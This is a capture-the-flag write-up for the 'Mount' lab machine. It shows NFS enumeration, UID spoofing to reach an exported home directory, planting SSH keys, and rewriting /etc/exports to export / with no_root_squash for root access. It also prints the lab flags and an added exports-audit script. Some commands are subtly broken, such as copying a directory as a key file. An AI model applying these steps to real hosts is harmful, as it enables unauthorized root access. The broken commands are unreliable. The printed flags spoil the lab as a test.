Mount

Target description

  • QQ group: 660930334

I. Information Gathering

1. Host discovery

┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-10 23:19 CST
Nmap scan report for 192.168.2.1
Host is up (0.0022s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.0023s latency).
MAC Address: 08:00:27:9A:56:B0 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.8
Host is up (0.00093s latency).
MAC Address: 08:00:27:07:0B:9B (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.12 seconds

2. Port scanning

1) Full port scan

┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
└─# nmap --min-rate 10000 -p- 192.168.2.8
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-10 23:20 CST
Nmap scan report for 192.168.2.8
Host is up (0.00031s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
79/tcp open finger
80/tcp open http
111/tcp open rpcbind
2049/tcp open nfs
34109/tcp open unknown
37331/tcp open unknown
46281/tcp open unknown
49849/tcp open unknown
MAC Address: 08:00:27:07:0B:9B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 10.21 seconds

Open ports: 22, 79, 80, 111, 2049, 34109, 37331, 46281, 49849

2) Detailed service scan

┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,79,80,111,2049,34109,37331,46281,49849 192.168.2.8
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-10 23:21 CST
Nmap scan report for 192.168.2.8
Host is up (0.00074s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
79/tcp open finger OpenBSD fingerd (ported to Linux)
| finger: \x0D
| Welcome to Linux version 4.19.0-27-amd64 at Mount !\x0D
|
| 11:21:56 up 2 min, 0 users, load average: 0.00, 0.00, 0.00
| \x0D
|_No one logged on.\x0D
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.62 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 37331/tcp mountd
| 100005 1,2,3 50877/tcp6 mountd
| 100005 1,2,3 52224/udp6 mountd
| 100005 1,2,3 55192/udp mountd
| 100021 1,3,4 37415/udp nlockmgr
| 100021 1,3,4 41085/tcp6 nlockmgr
| 100021 1,3,4 46281/tcp nlockmgr
| 100021 1,3,4 57380/udp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs 3-4 (RPC #100003)
34109/tcp open mountd 1-3 (RPC #100005)
37331/tcp open mountd 1-3 (RPC #100005)
46281/tcp open nlockmgr 1-4 (RPC #100021)
49849/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:07:0B:9B (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: Host: Mount; OSs: Linux, Linux 4.19.0-27-amd64; CPE: cpe:/o:linux:linux_kernel, cpe:/o:linux:linux_kernel:4.19.0-27-amd64

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.02 seconds

  1. Port 22: SSH service
  2. Port 79: finger service
  3. Port 80: HTTP service
  4. Port 111: rpcbind service, supporting rpcbind versions 2-4. rpcbind is the RPC port mapper that NFS relies on to advertise its services; where rpcbind is open there is usually NFS network sharing as well, and NFS itself listens on port 2049.
  5. Port 2049: NFS service, which provides network file system sharing and lets other hosts mount remote directories; it has no encryption by default and may expose sensitive parts of the file system.

3) UDP port scan

┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
└─# nmap -sU --top-ports 100 192.168.2.8
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-10 23:23 CST
Nmap scan report for 192.168.2.8
Host is up (0.00050s latency).
Not shown: 97 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
111/udp open rpcbind
2049/udp open nfs
MAC Address: 08:00:27:07:0B:9B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 109.13 seconds

3. Service enumeration

1) Port 79: finger service

The finger program/service is used to retrieve details about a computer's users. The information returned usually includes the user's login name and full name, and in some cases further details: office location and phone number (if available), when the user logged in, idle time, when the user last read mail, and the contents of the user's plan and project files.

Finger can query user information on a remote host:

  • If the user exists, it returns that user's details, starting with Login:...
  • If the user does not exist, it returns "no such user"


2) Port 80: HTTP service

Browsing the service on port 80 turned up nothing, and a directory scan found nothing useful either.

┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
└─# curl http://192.168.2.8
index

3) Port 111: rpcbind service

Portmapper is a service that maps network service ports to RPC (remote procedure call) program numbers. It is commonly used together with NFS (Network File System), NIS (Network Information Service) and other RPC-based services to manage network services.
It is the core port mapper for RPC services, responsible for mapping RPC program numbers (such as 100003 for NFS) to the actual ports (such as 2049).


4) Port 2049: NFS service

NFS is a client/server system that lets users access files over the network as seamlessly as if they were in a local directory.

  1. List the shares the server exports

    showmount -e <IP>
  2. Mount command

    mount -t nfs [-o vers=2] <ip>:<remote_folder> <local_folder> -o nolock


II. Penetration Testing

1. NFS service exploitation

1) Listing NFS shares

Use showmount to list the exports that can be mounted.

┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
└─# showmount -e 192.168.2.8
Export list for 192.168.2.8:
/home/ll104567 *

The export list shows that the home directory of user ll104567 under /home can be mounted.

2) Mounting the NFS share

  1. Create a mount point
    ┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
    └─# mkdir mnt
  2. Mount the NFS share
    ┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
    └─# mount -t nfs 192.168.2.8:/home/ll104567 ./mnt -o nolock,rw,vers=3
  3. Check the permissions of the mounted directory
    ┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
    └─# ls -ls
    4 drwx------ 2 6666 6666 4096 8月21日 11:45 mnt
  4. Entering mnt fails with "permission denied"
    ┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
    └─# cd mnt
    cd: 权限不够: mnt
  5. Confirm that the mount succeeded
    ┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
    └─# df
    文件系统 1K的块 已用 可用 已用% 挂载点
    ...
    192.168.2.8:/home/ll104567 29801472 2471168 25791232 9% /root/miaosec/maze-sec/mount/mnt
    The share is mounted successfully at the mnt directory.

This shows the share itself is in place; the export presumably has root_squash set, so root is simply not allowed to access it and only the specified UID 6666 can.

3) Matching the NFS UID

  1. Create a local user with the matching UID

    ┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
    └─# useradd -u 6666 nfsuser
  2. Switch to user nfsuser

    ┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
    └─# su - nfsuser
    su: warning: cannot change directory to /home/nfsuser: 没有那个文件或目录
    $ bash
    nfsuser@kali:/root/miaosec/maze-sec/mount$

2. Writing an SSH public key

With the UID matched, we can now enter the remotely mounted directory mnt.

nfsuser@kali:/root/miaosec/maze-sec/mount/mnt$ ls -la
总计 20
drwx------ 2 nfsuser nfsuser 4096 8月21日 11:45 .
drwxr-xr-x 11 root root 4096 9月11日 11:03 ..
-rw-r--r-- 1 nfsuser nfsuser 220 2019年 4月18日 .bash_logout
-rw-r--r-- 1 nfsuser nfsuser 3526 2019年 4月18日 .bashrc
-rw-r--r-- 1 nfsuser nfsuser 807 2019年 4月18日 .profile

  1. Generate a key pair

    ┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
    └─# ssh-keygen
    Generating public/private ed25519 key pair.
    Enter file in which to save the key (/root/.ssh/id_ed25519):
    /root/.ssh/id_ed25519 already exists.
    Overwrite (y/n)?
  2. Copy the public key id_ed25519.pub to the nfsuser user's directory

    ┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
    └─# cp ~/.ssh/id_ed25519.pub /home/nfsuser
  3. Write the public key into the mounted directory mnt and set the execute bit (the .ssh directory does not exist yet, so create it first)

    nfsuser@kali:/root/miaosec/maze-sec/mount/mnt$ mkdir -p .ssh
    nfsuser@kali:/root/miaosec/maze-sec/mount/mnt$ cat /home/nfsuser > .ssh/authorized_keys
    nfsuser@kali:/root/miaosec/maze-sec/mount/mnt$ chmod +x .ssh/authorized_keys

III. Getting Access as ll104567

Now simply log in directly:

┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
└─# ssh ll104567@192.168.2.8
Linux Mount 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Aug 20 23:46:24 2025 from 192.168.3.94
ll104567@Mount:~$ id
uid=6666(ll104567) gid=6666(ll104567) groups=6666(ll104567)

IV. Privilege Escalation

Check the sudo privileges

ll104567@Mount:~$ sudo -l
Matching Defaults entries for ll104567 on Mount:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ll104567 may run the following commands on Mount:
(ALL) NOPASSWD: /sbin/reboot

/sbin/reboot can be run with root privileges.

1. NFS configuration file

View the configuration file

ll104567@Mount:~$ cat /etc/exports 
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/home/ll104567 *(rw,sync,root_squash,no_subtree_check)

The file defines exactly which directory may be mounted, and root_squash is set, which restricts root's privileges on the export.

Checking the file's attributes shows that user ll104567 has write permission on it.

ll104567@Mount:~$ ls -la /etc/exports 
-rw-rw---- 1 root ll104567 444 Aug 21 00:00 /etc/export

2. NFS configuration hijack

Modify the configuration file and add a path that is not subject to root_squash: export the root directory / directly.

ll104567@Mount:~$ echo "/ *(rw,sync,no_root_squash,no_subtree_check)" >> /etc/exports 
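The two export lines that now sit in /etc/exports (the original root_squash entry and the appended no_root_squash entry for /) are exactly what an audit of that file should catch, as is the group-writable mode that let ll104567 edit it in the first place. The following Python is an added example, not part of the original write-up: it parses exports(5)-style lines and flags wildcard clients, no_root_squash and an exported /, and checks whether an ls -l mode string lets a non-root account modify the file. The sample text is constructed from the entries shown on this page.

```python
import re

# Constructed sample: the export found on the box plus the entry that was
# appended to /etc/exports during the privilege-escalation step above.
SAMPLE_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
/home/ll104567 *(rw,sync,root_squash,no_subtree_check)
/ *(rw,sync,no_root_squash,no_subtree_check)
"""

def parse_exports(text):
    """Return (path, client, options) tuples from exports(5)-style text."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # strip comments and blanks
        if not line:
            continue
        path, *specs = line.split()
        for spec in specs or ["*"]:            # no client spec means everyone
            m = re.fullmatch(r"([^(]*)(?:\((.*)\))?", spec)
            client = m.group(1) or "*"
            opts = set(filter(None, (m.group(2) or "").split(",")))
            entries.append((path, client, opts))
    return entries

def audit_exports(text):
    """Return (path, client, finding) tuples for the risky patterns on this box."""
    findings = []
    for path, client, opts in parse_exports(text):
        if client == "*":   # any host may mount; AUTH_SYS lets the client pick its uid
            findings.append((path, client, "wildcard client"))
        if "no_root_squash" in opts:   # remote uid 0 is not mapped to nobody
            findings.append((path, client, "no_root_squash"))
        if path == "/":   # /root, /etc and everything else reachable over NFS
            findings.append((path, client, "whole filesystem exported"))
    return findings

def exports_writable_by_nonroot(mode, owner, group):
    """True if an ls -l mode string such as '-rw-rw----' lets a non-root
    account modify the file through the owner, group or other write bit."""
    user_w, group_w, other_w = mode[2] == "w", mode[5] == "w", mode[8] == "w"
    return (user_w and owner != "root") or (group_w and group != "root") or other_w

if __name__ == "__main__":
    for path, client, finding in audit_exports(SAMPLE_EXPORTS):
        print(f"{path} {client}: {finding}")
    # The ls -la output on this box: -rw-rw---- 1 root ll104567
    print("exports editable by non-root:",
          exports_writable_by_nonroot("-rw-rw----", "root", "ll104567"))
```

Run against a real host's /etc/exports, the original /home/ll104567 line alone already produces a wildcard-client finding, which is the condition that made the UID-matching step work.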

Reboot the system so the configuration takes effect

ll104567@Mount:~$ sudo /sbin/reboot

Checking the export list again, the root directory is now mountable.

┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
└─# showmount -e 192.168.2.8
Export list for 192.168.2.8:
/ *
/home/ll104567 *

Mount the root directory at m_root under the current directory

┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
└─# mount -t nfs 192.168.2.8:/ ./m_root -o nolock

3. Writing the root SSH public key

Copy the SSH public key into /root/.ssh

┌──(root㉿kali)-[~/…/mount/m_root/root/.ssh]
└─# cp /home/nfsuser authorized_keys
┌──(root㉿kali)-[~/…/maze-sec/mount/m_root/root]
└─# chmod +x .ssh/authorized_keys

4. Getting root

┌──(root㉿kali)-[~/…/maze-sec/mount/m_root/root]
└─# ssh root@192.168.2.8
Linux Mount 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Aug 20 23:45:38 2025 from 192.168.3.94
root@Mount:~# id
uid=0(root) gid=0(root) groups=0(root)

V. Getting the Flags

root@Mount:~# cat /home/guest/user.txt /root/root.txt 
flag{user-60b725f10c9c85c70d97880dfe8191b3}
flag{root-a8a78d0ff555c931f045b6f448129846}

Mount
http://miao-sec.github.io/Maze-sec/Mount/
Author: Miao
Published: January 9, 2026
License: BY-MIAO